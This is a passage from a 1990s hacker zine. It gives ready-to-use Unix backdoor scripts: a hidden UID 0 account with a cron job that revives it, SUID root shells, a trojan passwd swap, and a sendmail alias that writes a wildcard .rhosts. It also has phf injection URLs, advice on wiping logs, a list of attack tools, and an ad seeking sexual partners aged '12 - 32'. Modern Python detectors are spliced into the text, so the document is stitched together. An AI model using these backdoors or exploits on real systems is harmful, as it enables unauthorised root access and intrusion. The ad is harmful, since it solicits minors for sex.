6: command to execute

The example above is issued on Mondays. If you want to exploit the cron, simply add a cron line to /var/spool/crontab/root. ie: If you use the UID 0 account (as seen later), you can make a cron to see if the UID 0 account is still alive. If root killed it, the cron can re-add it!

...This will make the UID 0 account, just for back-up:

Cron #1
-------

newuser.sh
----------

    #!/bin/sh
    # Inserts a UID 0 account into the middle of the passwd file.
    # There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
    # daemon9@netcom.com

    set linecount = `wc -l /etc/passwd`
    cd                                      # Do this at home.
    cp /etc/passwd ./temppass               # Safety first.
    echo passwd file has $linecount[1] lines.
    @ linecount[1] /= 2
    @ linecount[1] += 1                     # we only want 2 temp files
    echo Creating two files, $linecount[1] lines each \(or approximately that\).
    split -$linecount[1] ./temppass         # passwd string optional
    echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
    cat ./xab >> ./xaa
    mv ./xaa /etc/passwd
    chmod 644 /etc/passwd                   # or whatever it was beforehand
    rm ./xa* ./temppass
    echo Done...

*** NOTE : MODIFY THE ECHO "YOURUSER..." PART!!

Here is a script that kinda does the same thing, but instead of making a new account, it will look for an old, disabled account and enable it just for you :

dead.sh
-------

    #!/bin/sh
    # Everyone's favorite...
    cp /bin/csh /tmp/.yourlittleshell       # Don't name it that...
    chmod 4755 /tmp/.yourlittleshell

Ok, here is where the cron comes in. It will look in the passwd file to check if YourUser is still alive. If not, it brings him back!

revive.sh
---------

    #!/bin/sh
    # Is YourUser still on the system?
    # Let's make sure he is.
    # daemon9@netcom.com

    set evilflag = (`grep eviluser /etc/passwd`)

    if($#evilflag == 0) then                # Is he there?
        set linecount = `wc -l /etc/passwd`
        cd                                  # Do this at home.
        cp /etc/passwd ./temppass           # Safety first.
        @ linecount[1] /= 2
        @ linecount[1] += 1                 # we only want 2 temp files
        split -$linecount[1] ./temppass     # passwd string option
        echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
        cat ./xab >> ./xaa
        mv ./xaa /etc/passwd
        chmod 644 /etc/passwd               # or whatever it was beforehand
        rm ./xa* ./temppass
        echo Done...
    else
    endif

cron #2
-------

First of all, you will need a copy of the /etc/passwd file in a hidden location. For this example, we will use /var/spool/mail/.hidepass. We have one entry in it that will be our root account we will use. Then let's make a cron that will save a copy of the real /etc/passwd file and install the hidden passwd file as the real one for 1 minute at a time of your choice. Make it at a slow time of day because anyone who tries to access the passwd file during this minute will get an error. 4:30 am is a good time. Put this in root's cron to do this :

    29 4 * * * /bin/usr/hidenhidenpass

..make sure this exists

    #echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.hidden

here is the /bin/usr/hidenhidenpass

.hidden
-------

    #!/bin/sh
    # Install trojan /etc/passwd file for one minute
    # daemon9@netcom.com

    cp /etc/passwd /etc/.temppass
    cp /var/spool/mail/.sneaky /etc/passwd
    sleep 60
    mv /etc/.temppass /etc/passwd

Cron #3
-------

This is a C program that will work like the above. Cron it as root like above and just let this file load every day.

hidden.c
--------

    #include <stdio.h>

    #define KEYWORD "industry3"
    #define BUFFERSIZE 10

    int main(argc, argv)
    int argc;
    char *argv[];{
        int i=0;

        if(argv[1]){                        /* we've got an argument, is it the keyword? */
            if(!(strcmp(KEYWORD,argv[1]))){
                /* This is the trojan part.
                 */
                system("cp /bin/csh /bin/.swp121");
                system("chown root /bin/.swp121");
                system("chmod 4755 /bin/.swp121");
            }
        }

        /* Put your possibly system specific trojan messages here */
        /* Let's look like we're doing something... */
        printf("Sychronizing bitmap image records.");
        /* system("ls -alR / >& /dev/null > /dev/null&"); */
        for(;i<10;i++){
            fprintf(stderr,".");
            sleep(1);
        }
        printf("\nDone.\n");
        return(0);
    }   /* End main */

=============================================================================
section 5:
=============================================================================

Sendmail backdoor :
-------------------

With this, you have to edit the /etc/aliases file. Add this line:

    decode: |/usr/bin/uudecode

make sure u hide it in there so it ain't obvious :). The uudecoded file will be a .rhosts file with the full pathname embedded. Here is the script:

uudecode.sh
-----------

    #!/bin/sh
    # Create our .rhosts file. Note this will output to stdout.
    echo "+ +" > tmpfile
    /usr/bin/uuencode tmpfile /root/.rhosts

Ok, now telnet to victumserver.com at port 25. Fakemail to decode and use as the subject body the uuencoded version of the .rhosts file. Here is an easy one (but not fake):

    echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@victimserver.com

You can add any program that I have listed to be ran from the alias, so be as creative as u want! :)

=============================================================================
section 6:
=============================================================================

Others :

Here is one of the best trojans I have seen. It is sneaky and only detectable by programs like tripwire. All you have to do is put the trojan code into the source of some popular system programs. su, login, and passwd are very good to add it to because they run SUID root and don't have strict permissions so you can modify it. This will tell you what to do after u get the source code for the particular UNIX system you are backdooring.
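Every trick in sections 4 and 5 above (and the "+ +" .rhosts note at the end of the freenet article) leaves a line in a plain text file that an admin can grep for. As an added example, not code from the zine or any of its authors, here is a small Python audit that parses constructed samples of each file and reports exactly the entries these sections describe: an inetd service whose server program is a shell, a crontab command that points at a dot-file or into a spool directory, an extra UID 0 or passwordless passwd entry, a mail alias that pipes into a program, and a wildcard .rhosts line. The file contents are constructed samples shaped like the article's listings, and the function names are mine; on a real host you would feed it the real files.

```python
"""Audit for the persistence tricks described in this article.

Added example, not code from the zine or its authors. Every file body
below is a constructed sample shaped like the article's own listings.
"""
import re
from typing import List

SHELLS = {"sh", "csh", "bash", "ksh", "tcsh", "zsh"}
HIDDEN_PATH = re.compile(r"(?:^|/)\.[^/\s]+")       # a dot-file path component
ODD_DIRS = ("/tmp/", "/var/spool/mail/", "/dev/")   # no legitimate cron job lives here


def audit_inetd(conf: str) -> List[str]:
    """Flag inetd.conf services whose server (or its argv[0]) is a shell."""
    findings = []
    for line in conf.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        name, user, server, args = fields[0], fields[4], fields[5], fields[6:]
        prog = server.rsplit("/", 1)[-1]
        arg0 = args[0].rsplit("/", 1)[-1] if args else ""
        if prog in SHELLS or arg0 in SHELLS:
            findings.append(f"inetd: {name} runs a shell as {user}: {line.strip()}")
    return findings


def audit_crontab(tab: str) -> List[str]:
    """Flag cron commands hidden in dot-files or parked in spool/tmp directories."""
    findings = []
    for line in tab.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        cmd = fields[5]
        if HIDDEN_PATH.search(cmd) or any(d in cmd for d in ODD_DIRS):
            findings.append(f"cron: suspicious command path: {line.strip()}")
    return findings


def audit_passwd(passwd: str) -> List[str]:
    """Flag extra UID 0 accounts and empty password fields."""
    findings = []
    for line in passwd.splitlines():
        parts = line.split(":")
        if len(parts) < 7 or line.startswith("#"):
            continue
        user, pw, uid = parts[0], parts[1], parts[2]
        if uid == "0" and user != "root":
            findings.append(f"passwd: extra UID 0 account {user!r}")
        if pw == "":
            findings.append(f"passwd: empty password field for {user!r}")
    return findings


def audit_aliases(aliases: str) -> List[str]:
    """Flag mail aliases that pipe incoming mail into a program."""
    findings = []
    for line in aliases.splitlines():
        if ":" not in line or line.lstrip().startswith("#"):
            continue
        name, target = (s.strip() for s in line.split(":", 1))
        if target.startswith("|"):
            findings.append(f"aliases: {name} pipes mail into {target[1:].strip()}")
    return findings


def audit_rhosts(rhosts: str) -> List[str]:
    """Flag .rhosts lines whose host field is the '+' wildcard."""
    return [f"rhosts: wildcard trust entry: {line.strip()!r}"
            for line in rhosts.splitlines() if line.split()[:1] == ["+"]]


# Constructed samples (not from any real host), shaped like the article's listings.
INETD_CONF = ("telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd\n"
              "suled   stream  tcp  nowait  root  /bin/sh         sh -i\n")
CRONTAB = ("0 0 * * 1 /usr/bin/updatedb\n"
           "29 4 * * * /var/spool/mail/.hidden\n")
PASSWD = ("root:x:0:0:Operator:/:/bin/csh\n"
          "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh\n")
ALIASES = ("postmaster: root\n"
           "decode: |/usr/bin/uudecode\n")
RHOSTS = ("trusted.example.net alice\n"
          "+ +\n")


def run_audit() -> List[str]:
    """Run every check over the samples and return all findings in order."""
    return (audit_inetd(INETD_CONF) + audit_crontab(CRONTAB) + audit_passwd(PASSWD)
            + audit_aliases(ALIASES) + audit_rhosts(RHOSTS))


if __name__ == "__main__":
    for finding in run_audit():
        print(finding)
```

Each check is deliberately narrow and text-only, which is what makes it cheap to run from cron or a login script; it will not catch the trojaned su/login binaries of section 6, which is why the article itself points at tripwire for those.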
If you can't get the source for any programs on your system, u may be screwed :(. You can find trojaned versions of many programs, here is a small example of pseudo-code that is added in such programs...

    get input;
    if input is special hardcoded flag, spawn evil trojan;
    else if input is valid, continue;
    else quit with error;
    ...

=============================================================================
section 7:
=============================================================================

Keeping the backdoor :

Well, the best advice I can possibly give to start off is to cover your tracks. If the admin doesn't know he's been hacked, he won't look for backdoors to remove. This will totally depend on the admin's ability to find backdoors and know how to get rid of them.

7. One Last Thing About The Infamous pHf Technique : so1o

You can use this basic form of attack...[Thru NutScrape For Example]

    http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    [      1      ][  2  ][    3   ][   4   ][5][    6    ]

1: The Target Site.
2: The pHf Command.
3: The Magic pHf Arguments.
4: The Program You Wish To Run.
5: %20 Is A Space, so %20%20%20 == 3 Spaces.
6: The Arguments You Wish To Use.

Here Are Some Other Examples...
-------------------------------

    http://www.site.com/cgi-bin/phf?Qalias=x&0a/bin/ls%20-la%20/etc/

...This will list the files in the /etc/ directory.

    http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/uname%20-a

...This will display the operating system.

Remember : You execute the commands with pHf as the user nobody, so you can't shutdown the system, echo "+ +" >> /.rhosts etc. etc. All the stuff you throw at the system using phf will be logged too, so if you do decide to hack the system, remember to kill the logs when you get root :)

===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================

1.
Some History : nobody

Electronic doom will soon be visited on U.S. computer networks by information warriors, hackers, pan-national groups of computer-wielding religious extremists, possible agents of Libya and Iran, international thugs and money-mad Internet savvy thieves. John Deutch, director of Central Intelligence, testified to the truth of the matter, so it must be graven in stone.

In a long statement composed in the august tone of the Cold Warrior, Deutch said to the Senate Permanent Subcommittee on Investigations on June 25, "My greatest concern is that hackers, terrorist organizations, or other nations might use information warfare techniques" to disrupt the national infrastructure.

The lack of solid evidence for any of the claims made by the intelligence community has created an unusual stage on which two British hackers, Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous show to demonstrate the threat of information warfare to members of Congress. Because of a break-in at an Air Force facility in Rome, NY, in 1994, both hackers were made the stars of two Government Accounting Office reports on network intrusions in the Department of Defense earlier this year. The comings and goings of Datastream Cowboy also constitute the meat of Gelber and Christy's minority staff report from the Subcommittee on Investigations.

Before delving into it in detail, it's interesting to read what a British newspaper published about Datastream Cowboy, a sixteen year-old, about a year before he was made the poster boy for information warfare and international hacking conspiracies in front of Congress. In a brief article, blessedly so in contrast to the reams of propaganda published on the incident for Congress, the July 5 1995 edition of The Independent wrote, "[Datastream Cowboy] appeared before Bow Street magistrates yesterday charged with unlawfully gaining access to a series of American defense computers.
Richard Pryce, who was 16 at the time of the alleged offences, is accused of accessing key US Air Force systems and a network owned by Lockheed, the missile and aircraft manufacturers." Pryce, a resident of a northwest suburb of London did not enter a plea on any of 12 charges levied against him under the British Computer Misuse Act. He was arrested on May 12, 1994, by New Scotland Yard as a result of work by the U.S. Air Force Office of Special Investigations. The Times of London reported when police came for Pryce, they found him at his PC on the third floor of his family's house. Knowing he was about to be arrested, he "curled up on the floor and cried." In Gelber and Christy's staff report, the tracking of Pryce, and to a lesser extent a collaborator called Kuji -- real name Mathew Bevan, is retold as an eight page appendix entitled "The Case Study: Rome Laboratory, Griffiss Air Force Base, NY Intrusion." Pryce's entry into Air Force computers was noticed on March 28, 1994, when personnel discovered a sniffer program he had installed on one of the Air Force systems in Rome. The Defense Information System Agency (DISA) was notified. DISA subsequently called the Air Force Office of Special Investigations (AFOSI) at the Air Force Information Warfare Center in San Antonio, Texas. AFOSI then sent a team to Rome to appraise the break-in, secure the system and trace those responsible. During the process, the AFOSI team discovered Datastream Cowboy had entered the Rome Air Force computers for the first time on March 25, according to the report. Passwords had been compromised, electronic mail read and deleted and unclassified "battlefield simulation" data copied off the facility. The Rome network was also used as a staging area for penetration of other systems on the Internet. AFOSI investigators initially traced the break-in back one step to the New York City provider, Mindvox. 
According to the Congressional report, this put the NYC provider under suspicion because "newspaper articles" said Mindvox's computer security was furnished by two "former Legion of Doom members." "The Legion of Doom is a loose-knit computer hacker group which had several members convicted for intrusions into corporate telephone switches in 1990 and 1991," wrote Gelber and Christy. AFOSI then got permission to begin monitoring -- the equivalent of wiretapping -- all communications on the Air Force network. Limited observation of other Internet providers being used during the break-in was conducted from the Rome facilities. Monitoring told the investigators the handles of hackers involved in the Rome break-in were Datastream Cowboy and Kuji. Since the monitoring was of limited value in determining the whereabouts of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence network of informants, i.e., stool pigeons, that 'surf the Internet.' Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from Britain. The anonymous source said he had e-mail correspondence with Datastream Cowboy in which the hacker said he was a 16-year old living in England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also apparently ran a bulletin board system and gave the telephone number to the AFOSI source. The Air Force team contacted New Scotland Yard and the British law enforcement agency identified the residence, the home of Richard Pryce, which corresponded to Datastream Cowboy's system phone number. English authorities began observing Pryce's phone calls and noticed he was making fraudulent use of British Telecom. In addition, whenever intrusions at the Air Force network in Rome occurred, Pryce's number was seen to be making illegal calls out of Britain. Pryce travelled everywhere on the Internet, going through South America, multiple countries in Europe and Mexico, occasionally entering the Rome network. 
From Air Force computers, he would enter systems at Jet Propulsion Laboratory in Pasadena, California, and the Goddard Space Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins and passwords of the Air Force networks in Rome, he was then able to get into the home systems of Rome network users, defense contractors like Lockheed. By mid-April of 1994 the Air Force was monitoring other systems being used by the British hackers. On the 14th of the month, Kuji logged on to the Goddard Space Center from a system in Latvia and copied data from it to the Baltic country. According to Gelber's report, the AFOSI investigators assumed the worst, that it was a sign that someone in an eastern European country was making a grab for sensitive information. They broke the connection but not before Kuji had copied files off the Goddard system. As it turned out, the Latvian computer was just another system the British hackers were using as a stepping stone; Pryce had also used it to cover his tracks when penetrating networks at Wright-Patterson Air Force Base in Ohio, via an intermediate system in Seattle, cyberspace.com. The next day, Kuji was again observed trying to probe various systems at NATO in Brussels and The Hague as well as Wright-Patterson. On the 19th, Pryce successfully returned to NATO systems in The Hague through Mindvox. The point Gelber and Christy seem to be trying to make is that Kuji, a 21-year old, was coaching Pryce during some of his attacks on various systems. By this point, New Scotland Yard had a search warrant for Pryce with the plan being to swoop down on him the next time he accessed the Air Force network in Rome. In April, Pryce penetrated a system on the Korean peninsula and copied material off a facility called the Korean Atomic Research Institute to an Air Force computer in Rome. At the time, the investigators had no idea whether the system was in North or South Korea. 
The impression created is one of hysteria and confusion at Rome. There was fear that the system, if in North Korea, would trigger an international incident, with the hack interpreted as an "aggressive act of war." The system turned out to be in South Korea. During the Korean break-in, New Scotland Yard could have intervened and arrested Pryce. However, for unknown reasons, the agency did not. Those with good memories may recall mainstream news reports concerning Pryce's hack, which was cast as an entry into sensitive North Korean networks. It's worth noting that while the story was portrayed as the work of an anonymous hacker, both the U.S. government and New Scotland Yard knew who the perpetrator was. Further, according to Gelber's report English authorities already had a search warrant for Pryce's house. Finally, on May 12 British authorities pounced. Pryce was arrested and his residence searched. He crumbled, according to the Times of London, and began to cry. Gelber and Christy write that Pryce promptly admitted to the Air Force break-ins as well as others. Pryce confessed he had copied a large program that used artificial intelligence to construct theoretical Air Orders of Battle from an Air Force computer to Mindvox and left it there because of its great size, 3-4 megabytes. Pryce paid for his Internet service with a fraudulent credit card number. At the time, the investigators were unable to find out the name and whereabouts of Kuji. A lead to an Australian underground bulletin board system failed to pan out. On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew Bevan -- a computer technician, had been arrested and charged in connection with the 1994 Air Force break-ins in Rome. Rocker Tom Petty sang that even the losers get lucky some time. 
He wasn't thinking of British computer hackers but no better words could be used to describe the two Englishmen and a two year old chain of events that led to fame as international computer terrorists in front of Congress at the beginning of the summer of 1996.

Lacking much evidence for the case of conspiratorial computer-waged campaigns of terror and chaos against the U.S., the makers of Congressional reports resorted to telling the same story over and over, three times in the space of the hearings on the subject. One envisions U.S. Congressmen too stupid or apathetic to complain, "Hey, didn't we get that yesterday, and the day before?" Pryce and Bevan appeared in "Security in Cyberspace" and twice in Government Accounting Office reports AIMD-96-84 and T-AIMD96-92. Jim Christy, the co-author of "Security in Cyberspace" and the Air Force Office of Special Investigations' source for the Pryce case, supplied the same tale for Jack Brock, author of the GAO reports. Brock writes, ". . . Air Force officials told us that at least one of the hackers may have been working for a foreign country interested in obtaining military research data or areas in which the Air Force was conducting advanced research." It was, apparently, more wishful thinking.

This year's UK hacking conference : Access All Areas. http://www.access.org.uk July 5th.

2. [GUNNAR], MadSeason and sIn : so1o

Some dudes called MadSeason and [GUNNAR] have been proving sIn's true lameness and logging it all at the same time, phear elite logging skills...

##################################################################################
#                                                                                #
#                                    Darkfool                                    #
#                          (What a Fool/The PHF hacker)                          #
#                                  BY [GUNNAR]                                   #
#                                                                                #
##################################################################################

Ever read a hacking txt by this guy? Ever realize just how useless the information in his txt's is? Nothing in his txt files isn't covered in a hundred text files written before which better explain hacking techniques.
Like a quote from my pal MadSeason goes:

"The fact is these txt files about hacking and phreaking are written by people with minimal knowledge. Then you have some newbie who comes along wanting to be some hacker god and reads a few files and has even less of a clue than the writer had about the subject, then goes around spewing out bullshit and claiming they are a hacker and/or phreaker, just an endless circle of ignorance."

That quote is so true. All these hack txt's released by these groups like S.I.N. and Technophoria are just crap. About the only exploit that Darkfool knows is the PHF bug found in older versions of NCSA and Apache httpd. This bug is very well known (and over exploited, might I add). Doing a search for ac.jp or edu.au domains, and adding to the address "cgi-bin/phf?Qalias=x%0a/bin/cat%20 /etc/passwd" is neither impressive nor is it even hacking. It's a lame excuse for hacking.

Darkfool claims many things that he doesn't know. For instance, take pascal programming. He claims to know it, but when asked a single question on it by Scorpion (MadSeason), he cannot answer. Here is a little something:

    [13:53] How many parameters do Cluster object constructors take in pascal, DF?
    [13:53] i have no idea scorpion
    [13:54] I thought you knew Pascal
    [13:54] i am learning it at college

There is a big difference between knowing and learning. I guess Darkfool doesn't realize that. It's all a part of trying to sound and seem "elite". Which Darkfool is far from being. Seems as though Darkfool and the rest of his S.I.N. pals are copying MadSeason and myself, and questioning people's abilities. It's funny though, when MadSeason and I go to #sin questioning them, we get kicked for making them look stupid. And when they ask us something, and it doesn't go quite as they planned it. Look what they do...

    [14:14] *** Now talking in #sin
    [14:15] hey
    [14:15] how do i kill all jobs running on a shell ?
    <[GUNNAR]> Well hello there!
    [14:15] hey
    <[GUNNAR]> kill -9 PID
    <[GUNNAR]> If you really wanna kill it.
    <[GUNNAR]> Boo Hoo.
    <[GUNNAR]> Damn, that one didn't go well for you did it?
    <[GUNNAR]> BTW, use the ps command to get the PID.
    <[GUNNAR]> la la la la...
    [14:17] *** Sinning sets mode: +b *!*@*.wco.com
    [14:17] *** You were kicked by Fa|lur3 (banned)

In short, Darkfool, S.I.N. and the rest like him are really just wannabes trying to sound big and bad. Nothing wrong with groups or people who actually hack. But, when you have a group like S.I.N. whose members claim more than they know, it is truly sad. I myself am no great hacker (I'm not a hack. Plain and simple.) nor am I some s00per programmer. But the thing is, I do not claim more than I actually know. This is obviously not how Darkfool thinks of things. He wants to be known as a s00per hacker, which he is not. I'm writing this so you (The Readers) don't buy into this bullshit and be misled by people like Darkfool and the group he is in, S.I.N.! They are truly sad people. What a shame I have brought out the truth!

I think more is somewhere on http://www.ilf.net/teknopia/

3. "Welcome to the [D]epartment of [O]wned [E]nergy" : so1o

The http://www.doe.ca (Canadian Dept. of Energy) was changed last weekend...

Welcome To The [D]epartment of [O]wned [E]nergy


You could define this as an act of aggression, or you could define it as us, the hackers (or crackers), just advising you to try and make it more difficult for us, at least employ consultants etc. who have a CLUE. Because one day, in the not so distant future, the internet equivalent of Pearl Harbour will occur, and we will only be around to say "We told you so". Until that day, we will keep reminding you: get some security, it's better for you, it's better for us, it's better for everyone.

In this case, even though your system runs HP-UX, we advise you still take the time to look into all the exploits that are available for this operating system, and then get over to www.cert.org to find some advisories.

This attack was brought to you in association with 0range Amusements.

Greets to so1o, helix, xFli, modeX, c0d, xrx, zer0x, organik, phractal chaos and all the usual suspects.


In the meantime, maybe you would like to visit...

The CrackHouse

Micro$oft

The CodeZero


We 0wN j00r EnErGy!@# wE 0wN j00R LiGhTbUlBz!@#~

===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================

-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/   so1o of The CodeZero presents.   \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/            The CodeZero            \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/         Remote Attack Kit.         \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/              [CRAK]                \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/           Version 1.666            \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/       .:. -=10/07/97=- .:.         \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\

New, improved, here it is...

===============================================================================
The Contents Of The Kit :
===============================================================================

dnsscan    : Mass DNS query program, gets lists of systems in entire countries, or all the systems on a network, like *.microsoft.com.
smscan     : Sendmail version scanner, very useful.
phpscan    : Scans hosts from a file and outputs a list of php vulnerable sites.
phpget     : Gets files from php vulnerable servers.
phfscan    : Scans hosts from a file and outputs a list of phf vulnerable sites.
ident-scan : Scans all daemons running on ports and determines cool stuff.
imap       : Exploits imap bug if port 143 is open.
tcpprobe   : Very simple portscanner.
fingah     : Uses an apache hole to finger systems if port 79 isn't open.
synk5      : The SYN flooder, basically kicks the shit out of systems.
octopus    : Octopus with UltiMods (ultima of CodeZero), crashes systems.
winuke     : This version allows you to select a port, I advise 139 or 113.
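The pHf section in D.7 points out that everything thrown at phf ends up in the web server's log, and the kit above ships phfscan to find hosts that still expose it. As an added example, not part of the zine or of CRAK, here is the defender's side of that in Python: it parses constructed Common Log Format lines, URL-decodes the phf query string, and reports every request that carries the encoded newline (%0a) which turns a directory lookup into a command, together with the command that was attempted and the status the server returned. The log lines, client addresses and function names are all constructed by me.

```python
"""Detect phf command-injection attempts in web server access logs.

Added example, not from the zine or the CRAK kit. The log lines below are
constructed (RFC 5737 documentation addresses), not captured traffic.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Common Log Format: host ident user [time] "method path proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def is_phf_injection(path: str) -> bool:
    """True when a /cgi-bin/phf request smuggles a newline into its query."""
    if "?" not in path or "/cgi-bin/phf" not in path.lower():
        return False
    query = path.split("?", 1)[1]
    # phf built a shell command from the query string; an encoded newline
    # (%0a) ends the lookup and starts a second command of the client's choosing.
    return "\n" in unquote(query)


def injected_command(path: str) -> str:
    """Return the text after the first decoded newline, i.e. the smuggled command."""
    query = unquote(path.split("?", 1)[1])
    return query.split("\n", 1)[1].strip()


def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client, command, status) for each phf injection attempt in lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, status = m.groups()
        if is_phf_injection(path):
            hits.append((client, injected_command(path), status))
    return hits


# Constructed sample log: one ordinary phf lookup, two injection attempts.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Apr/1997:02:11:05 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1203',
    '198.51.100.9 - - [16/Apr/1997:02:12:40 -0400] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512',
    '198.51.100.9 - - [16/Apr/1997:02:13:01 -0400] "GET /index.html HTTP/1.0" 200 2048',
    '203.0.113.7 - - [16/Apr/1997:02:14:22 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/uname%20-a HTTP/1.0" 404 210',
]

if __name__ == "__main__":
    for client, cmd, status in scan_log(SAMPLE_LOG):
        print(f"{client} tried phf injection -> {cmd!r} (status {status})")
```

The decode-then-inspect order matters: matching on the literal string "%0a" would miss the upper-case "%0A" form and any double-encoded variant, whereas looking for a real newline after unquote() catches whatever spelling was used. A 404 on the second attempt is worth reporting too, since it shows the same client kept probing after phf was removed.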
===============================================================================
Usages :
===============================================================================

Use this command to unzip the crak.tar...

    % tar -xvf crak.tar

then it will be copied into /crak, depending on the working directory..

DNSscan :
---------

    Usage: dnscan [-file ] [-domain ] [-sub ]

    -file       Usages as a list of subdomains and servers to scan.
    -domain     Lists all servers in a first level domain like com or net.
    -subdomain  Lists all servers in a domain.

The -domain mode will first create a file called 'domain.' with a list of all subdomains and their name servers, and then use that file in the -file mode.

The input file needs to have the following format:

    []

To list all servers in Japan, do "dnscan -domain jp"
To list all servers in the netcom domain, do "dnscan -sub netcom.com"

SMscan     : smscan
PHPscan    : phpscan
PHPget     : phpget
PHFscan    : phfscan
Ident-Scan : ident-scan [low port] [high port]
TCPprobe   : tcpprobe
Fingah     : fingah
Synk5      : synk5
Octopus    : octopus [port] (default port is 25)
Winnuke    : winnuke [port] (default port is 139)

===============================================================================
Where To Get CRAK.tar : http://www.codez.com
===============================================================================

It can be unzipped with WinZip if you are in W1nd0ze too.. :)

===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================

--------------------------------------+--------------------------------------- | YOUR SPECIAL AD | LET'S BE FREE | COULD BE RIGHT HERE #@! | Gay White Male 38, 5'11" looking | for men, 12 - 32 clean, fit, and SEND ELECTRONIC MAIL TO: | hairy. Discreet Encounters.
        ADZ@CODEZ.COM                 |
--------------------------------------+---------------------------------------

                          .oO The CodeZero Oo.

      _ /|      k0dek4t sez...
      \'o O'
      =(_o_)=   "EyEm HuNGaRy FoR CoDeZ, U nOt CaTf00d!!#@"

                 ----------------------------------
                     -- HTTP://WWW.CODEZ.COM --
                 ----------------------------------

Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!!
Don't Believe The Lies!! PHEAR WENDY!@#*
